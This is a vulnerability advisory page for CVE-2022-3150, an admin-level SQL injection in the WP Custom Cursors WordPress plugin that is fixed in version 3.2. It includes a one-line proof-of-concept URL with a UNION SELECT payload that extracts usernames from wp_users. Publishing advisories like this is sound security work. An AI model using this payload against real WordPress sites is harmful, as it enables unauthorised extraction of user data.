WP Custom Cursors < 3.2 – Admin+ SQLi | CVE 2022-3150 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privileged users such as admin

Proof of Concept

As admin, open https://example.com/wp-admin/admin.php?page=wpcc_add_new&edit_row=-1+UNION+select+1,1,1,1,user_login,1,1,1,1,1,1,1,1,1,1,1+from+wp_users

Select “Text Cursor”, and the user's name will be in the input field

Affects Plugins

wp-custom-cursors

Fixed in 3.2

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

bb0806d7-21e3-4a65-910c-bf0625c338ec

Timeline

Publicly Published

2022-09-21 (about 1 years ago)

Added

2022-09-21 (about 1 years ago)

Last Updated

2023-06-30 (about 10 months ago)

Other

Published

Title

Published

2022-12-12

Title

Web Invoice <= 2.1.3 - Authenticated SQLi

Published

2014-08-01

Title

WordPress <= 1.5.1.1 - SQL Injection

Published

2021-08-06

Title

Paid Member Subscriptions < 2.4.2 - Authenticated SQL Injection

Published

2017-06-30

Title

WP Statistics <= 12.0.7 - Authenticated SQL Injection

Published

2021-09-21

Title

Game Server Status <= 1.0 - Admin+ SQL Injection